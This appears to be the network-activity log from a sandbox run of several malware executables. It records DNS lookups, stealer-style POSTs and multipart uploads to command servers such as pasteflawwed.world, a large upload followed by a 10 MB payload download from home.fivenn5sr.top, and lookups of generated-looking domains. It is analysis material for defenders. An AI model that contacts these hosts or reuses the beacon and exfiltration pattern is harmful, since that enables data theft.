                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DITrGdd20LgfMZe8%2FOyrPWan6VEYIZqTonHNUBb%2FXecEP6Xh%2F%2B%2FEngxUO8hEqZyStjGZeQVAeZ7bRv4vB0vxUVUtZMhWJoB2ifmLMwonDVSWII0%2BXXG8ULoFaXc9LkxxEgmNSuA%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f11882cd3981e-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=23742&min_rtt=21112&rtt_var=6593&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2861&recv_bytes=1818&delivery_rate=151767&cwnd=253&unsent_bytes=0&cid=1d7982ab209efa9d&ts=292&x=0"
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            aca90f55db.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=LBa0Y41qkWN0klNngw6XEevr4G4Foqpb1fxpZKTm26I-1740060503-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 87
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:24 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=8a3504tf7h7a6k76bgp1eohpcs; expires=Fri, 21 Feb 2025 14:08:24 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jUgXo%2Bup%2BIcusAmjg4%2BgeDt23eMxzggDlAbd9DGFIYSnQZPl5G3RSgwG5FO6R8tlkMGlqjFl1ocQindVhTI37%2Ba%2BYVCAJSjoecV7%2BCOcH3Z6bxsFUCxyApKOO8p43JM%2FipIvLTA%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f118a5bb676b9-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22857&min_rtt=21033&rtt_var=7426&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2860&recv_bytes=762&delivery_rate=131645&cwnd=253&unsent_bytes=0&cid=69ad80e3d04878cb&ts=235&x=0"
                                                          • flag-us
                                                            DNS
                                                            crl.microsoft.com
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            crl.microsoft.com
                                                            IN A
                                                            Response
                                                            crl.microsoft.com
                                                            IN CNAME
                                                            crl.www.ms.akadns.net
                                                            crl.www.ms.akadns.net
                                                            IN CNAME
                                                            a1363.dscg.akamai.net
                                                            a1363.dscg.akamai.net
                                                            IN A
                                                            2.19.252.143
                                                            a1363.dscg.akamai.net
                                                            IN A
                                                            2.19.252.157
                                                          • flag-gb
                                                            GET
                                                            http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
                                                            Remote address:
                                                            2.19.252.143:80
                                                            Request
                                                            GET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Accept: */*
                                                            If-Modified-Since: Thu, 11 Jul 2024 01:45:51 GMT
                                                            User-Agent: Microsoft-CryptoAPI/6.1
                                                            Host: crl.microsoft.com
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Content-Length: 1036
                                                            Content-Type: application/octet-stream
                                                            Content-MD5: +oTkvMkqpdtzWrUHEQQM3g==
                                                            Last-Modified: Thu, 12 Dec 2024 00:06:56 GMT
                                                            ETag: 0x8DD1A40E476D877
                                                            Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                            x-ms-request-id: bbedffbb-e01e-001d-74ca-685a56000000
                                                            x-ms-version: 2009-09-19
                                                            x-ms-lease-status: unlocked
                                                            x-ms-blob-type: BlockBlob
                                                            Date: Thu, 20 Feb 2025 14:08:25 GMT
                                                            Connection: keep-alive
                                                          • flag-us
                                                            DNS
                                                            www.microsoft.com
                                                            5782e13f6e.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            www.microsoft.com
                                                            IN A
                                                            Response
                                                            www.microsoft.com
                                                            IN CNAME
                                                            www.microsoft.com-c-3.edgekey.net
                                                            www.microsoft.com-c-3.edgekey.net
                                                            IN CNAME
                                                            www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                            www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                            IN CNAME
                                                            e13678.dscb.akamaiedge.net
                                                            e13678.dscb.akamaiedge.net
                                                            IN A
                                                            2.17.5.133
                                                          • flag-gb
                                                            GET
                                                            http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
                                                            Remote address:
                                                            2.17.5.133:80
                                                            Request
                                                            GET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Accept: */*
                                                            If-Modified-Since: Sun, 18 Aug 2024 00:23:49 GMT
                                                            User-Agent: Microsoft-CryptoAPI/6.1
                                                            Host: www.microsoft.com
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Content-Length: 1078
                                                            Content-Type: application/octet-stream
                                                            Content-MD5: HqJzZuA065RHozzmOcAUiQ==
                                                            Last-Modified: Tue, 14 Jan 2025 20:41:31 GMT
                                                            ETag: 0x8DD34DBD43549F4
                                                            x-ms-request-id: 5831836a-601e-0003-07c9-66b68e000000
                                                            x-ms-version: 2009-09-19
                                                            x-ms-lease-status: unlocked
                                                            x-ms-blob-type: BlockBlob
                                                            Date: Thu, 20 Feb 2025 14:08:25 GMT
                                                            Connection: keep-alive
                                                            TLS_version: UNKNOWN
                                                            ms-cv: CASMicrosoftCV3cfbbbe0.0
                                                            ms-cv-esi: CASMicrosoftCV3cfbbbe0.0
                                                            X-RTag: RT
                                                          • flag-us
                                                            DNS
                                                            posqvevibesonly.tech
                                                            NL58452.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            posqvevibesonly.tech
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            NL58452.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 403 Forbidden
                                                            Date: Thu, 20 Feb 2025 14:08:25 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Frame-Options: SAMEORIGIN
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tenk4sPRFjQHlXDLSAH1fFb6C1ECNhCOcKiRxH5wVuONNL8sr2Ltep%2BchBb1BCNedv5ZmrVnWA1JUOgfuwsWXc8Si0ovqe2MyD%2B2axevuMdyPOKlxNpAENFXlKFjdEjtJ5mn7WY%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f11910b6a1239-LHR
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            NL58452.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=IS.BKHV8Qh.FCTQpQv_HidEd4OA5PXRd6_e.1OICp5E-1740060505-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 55
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:26 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=umd8k7uo60mgb9h6brhi38rusl; expires=Fri, 21 Feb 2025 14:08:25 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mH7DbFDm2VqxQDqt0vNL1buBSlfKO64AzZHlnyjBSKBkWcCZokN%2BWnur4qGFZuJMKsYnz6kLJzrUZVU9s1WwqlU6Eg9W0nhOmYhJn948KEo1vWNrIzaZEzV7UI56%2BsbiSkNutjQ%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f11913bd61239-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22763&min_rtt=21037&rtt_var=3967&sent=14&recv=12&lost=0&retrans=0&sent_bytes=8134&recv_bytes=1060&delivery_rate=433902&cwnd=257&unsent_bytes=0&cid=e5de3ef454e24c98&ts=328&x=0"
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            NL58452.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=G45NPDFKWF
                                                            Cookie: __cf_mw_byp=IS.BKHV8Qh.FCTQpQv_HidEd4OA5PXRd6_e.1OICp5E-1740060505-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1584
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:26 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=d2duf2ssmvfasanedebh38rvad; expires=Fri, 21 Feb 2025 14:08:26 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yNZqvaOz2hWdsTCQeZ6%2B9Bj6e6fpS80vDQnf18ED9ICXYAKLFyU6qf%2FQy4XxZ6BeGd2j4R8W1HIfDk0iWz3x7h0eIVtaikZSqenlJfAUGvoXzEnxXvHxPFVhsZNRRUY3dTP%2F%2FqA%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f119309831239-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22591&min_rtt=21037&rtt_var=3321&sent=17&recv=16&lost=0&retrans=0&sent_bytes=9312&recv_bytes=3086&delivery_rate=433902&cwnd=257&unsent_bytes=0&cid=e5de3ef454e24c98&ts=1177&x=0"
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            NL58452.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=O1EVDLS928J1IX
                                                            Cookie: __cf_mw_byp=IS.BKHV8Qh.FCTQpQv_HidEd4OA5PXRd6_e.1OICp5E-1740060505-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1102
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:27 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=bkeug6cok7r9dr6fr5nup0060a; expires=Fri, 21 Feb 2025 14:08:27 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=im8bl290DMwwI0yhVujYCuzgThX05gh99X16J7jRF7FNCcogVqkTsh1onLjzads8oqYD7d18VPWetHfhuprUyQF0zGgvDClu%2FKbVrlRa4HInVVXlLihgq73YzwEJN4Snzz24EYg%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f1198ba41ef37-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=24458&min_rtt=22567&rtt_var=7720&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2861&recv_bytes=1802&delivery_rate=138691&cwnd=253&unsent_bytes=0&cid=bad5c8818bfbade0&ts=255&x=0"
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            NL58452.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=IS.BKHV8Qh.FCTQpQv_HidEd4OA5PXRd6_e.1OICp5E-1740060505-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 89
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:27 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=u0pbh3batc7lg9dkg8f4ce96ac; expires=Fri, 21 Feb 2025 14:08:27 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O7Hyr9DdH91aNEiwGzls8LNgicBD4aMhaP5qsFDcLUke7q5liS4%2Fa8kLmndjqfSE%2F2PQGo1RG2NF86FCikPDqyTAxxpCoWAO6ycqOXISOL3%2FSg%2F6aJj5Lpv%2FAi234%2BRXzHKuJg8%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f119a9d043853-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=23042&min_rtt=21748&rtt_var=6834&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2860&recv_bytes=762&delivery_rate=152981&cwnd=252&unsent_bytes=0&cid=4f97c49a31d3fe9d&ts=206&x=0"
                                                          • flag-us
                                                            DNS
                                                            httpbin.org
                                                            372485f12e.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            httpbin.org
                                                            IN A
                                                            Response
                                                            httpbin.org
                                                            IN A
                                                            3.208.239.150
                                                            httpbin.org
                                                            IN A
                                                            3.214.119.249
                                                          • flag-us
                                                            DNS
                                                            httpbin.org
                                                            372485f12e.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            httpbin.org
                                                            IN AAAA
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            home.fivenn5sr.top
                                                            372485f12e.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            home.fivenn5sr.top
                                                            IN A
                                                            Response
                                                            home.fivenn5sr.top
                                                            IN A
                                                            45.156.22.254
                                                          • flag-us
                                                            DNS
                                                            home.fivenn5sr.top
                                                            372485f12e.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            home.fivenn5sr.top
                                                            IN AAAA
                                                            Response
                                                          • flag-fi
                                                            POST
                                                            http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk1739958006
                                                            372485f12e.exe
                                                            Remote address:
                                                            45.156.22.254:80
                                                            Request
                                                            POST /DoDOGDWnPbpMwhmjDvNk1739958006 HTTP/1.1
                                                            Host: home.fivenn5sr.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 291759
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            server: nginx/1.22.1
                                                            date: Thu, 20 Feb 2025 14:08:32 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 26
                                                          • flag-us
                                                            DNS
                                                            home.fivenn5sr.top
                                                            372485f12e.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            home.fivenn5sr.top
                                                            IN A
                                                            Response
                                                            home.fivenn5sr.top
                                                            IN A
                                                            45.156.22.254
                                                          • flag-us
                                                            DNS
                                                            home.fivenn5sr.top
                                                            372485f12e.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            home.fivenn5sr.top
                                                            IN AAAA
                                                            Response
                                                          • flag-fi
                                                            GET
                                                            http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk1739958006?argument=Y7jTn44MI7LvRE431740060511
                                                            372485f12e.exe
                                                            Remote address:
                                                            45.156.22.254:80
                                                            Request
                                                            GET /DoDOGDWnPbpMwhmjDvNk1739958006?argument=Y7jTn44MI7LvRE431740060511 HTTP/1.1
                                                            Host: home.fivenn5sr.top
                                                            Accept: */*
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            server: nginx/1.22.1
                                                            date: Thu, 20 Feb 2025 14:08:32 GMT
                                                            content-type: application/octet-stream
                                                            content-length: 10816560
                                                            content-disposition: attachment; filename="70291GAPXrceoaFFrkeo;"
                                                            last-modified: Wed, 19 Feb 2025 09:40:06 GMT
                                                            cache-control: no-cache
                                                            etag: "1739958006.1613824-10816560-3418429626"
                                                          • flag-us
                                                            DNS
                                                            rebeldettern.com
                                                            3e0505c684.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            rebeldettern.com
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            importenptoc.com
                                                            3e0505c684.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            importenptoc.com
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            voicesharped.com
                                                            3e0505c684.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            voicesharped.com
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            inputrreparnt.com
                                                            3e0505c684.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            inputrreparnt.com
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            torpdidebar.com
                                                            3e0505c684.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            torpdidebar.com
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            actiothreaz.com
                                                            3e0505c684.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            actiothreaz.com
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            POST
                                                            https://penetratebatt.pw/api
                                                            2b8d02974d.exe
                                                            Remote address:
                                                            172.67.161.147:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: penetratebatt.pw
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:37 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=473simu7f8nojeinnm3in8lrhv; expires=Fri, 21 Feb 2025 14:08:37 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QyobZfXKXaFddPht3yRT0Fjtm5VWjxjXw9p%2BJ27o%2BZBwMRy3I9G43bti0A037AmsbheDuCEGahU13o58ATPbg8ec1vttatTMjyToBfGe%2FNRe5Xq9BgHCVCF1HhIN4%2FsMZM%2B3"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f11d82d4c88bb-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=23779&min_rtt=21303&rtt_var=9147&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2858&recv_bytes=584&delivery_rate=158750&cwnd=253&unsent_bytes=0&cid=632f269310fe26e7&ts=252&x=0"
                                                          • flag-us
                                                            DNS
                                                            garulouscuto.com
                                                            3e0505c684.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            garulouscuto.com
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            breedertremnd.com
                                                            3e0505c684.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            breedertremnd.com
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            steamcommunity.com
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            steamcommunity.com
                                                            IN A
                                                            Response
                                                            steamcommunity.com
                                                            IN A
                                                            104.82.234.109
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            2b8d02974d.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 403 Forbidden
                                                            Date: Thu, 20 Feb 2025 14:08:37 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Frame-Options: SAMEORIGIN
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2B9RRJSxMPequeJHy8WK5myAqX%2BYUAXib3Lfz5oqWIbTgmmv4nVQ12%2F7zTfaEaiaFJbD62lwpOcoa7AKP51NMmrlzHn6%2FRvyb502cQUfV7fuFfDvofyKX5tI59zLvplYvRlH21E%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f11d9f847cd86-LHR
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            2b8d02974d.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=Xun2OteQPCnbhcQFZ27UutjeStBpLjnk7BANJpdT4Kc-1740060517-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 43
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:37 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=4cvrmbbas4mipp3h7sqogd7qqh; expires=Fri, 21 Feb 2025 14:08:37 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L52dAfIzakiUxAK66oavKIUT1z1ABj%2FHB4nW34aXQ9pQomxCSGdCuT6Rq7BFToK6aJPQDcNdqT3ZAoUqXUR721mSUyo6%2FW1q5g6OsWZ1jIikoFZnc3%2Bf48N2pP3AmHSWgaZuziU%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f11da3893cd86-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22517&min_rtt=21052&rtt_var=2516&sent=15&recv=13&lost=0&retrans=0&sent_bytes=8134&recv_bytes=1044&delivery_rate=461486&cwnd=257&unsent_bytes=0&cid=25cd9d2945906c4c&ts=229&x=0"
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            2b8d02974d.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=1R0998VCDVH6
                                                            Cookie: __cf_mw_byp=Xun2OteQPCnbhcQFZ27UutjeStBpLjnk7BANJpdT4Kc-1740060517-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1585
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:37 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=2ldqsi5hfb516rr7r77o0rfhdm; expires=Fri, 21 Feb 2025 14:08:37 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LAr8bvv4n%2FTSCCwIArzreA5iJH3bR1HUuiYnbQeCcNSZt%2BjheDTG0mboXZKqrQliYoiUhrzvhRj5F%2B73%2FZOYCDe%2F1FyTqcgWway3Dnrub4zUlY9pnztPZo7fnthjlX8YNuNeL8M%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f11dc4b63cd86-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22322&min_rtt=20898&rtt_var=2277&sent=19&recv=17&lost=0&retrans=0&sent_bytes=9312&recv_bytes=3070&delivery_rate=461486&cwnd=257&unsent_bytes=0&cid=25cd9d2945906c4c&ts=553&x=0"
                                                          • flag-gb
                                                            GET
                                                            https://steamcommunity.com/profiles/76561199822375128
                                                            5782e13f6e.exe
                                                            Remote address:
                                                            104.82.234.109:443
                                                            Request
                                                            GET /profiles/76561199822375128 HTTP/1.1
                                                            Connection: Keep-Alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
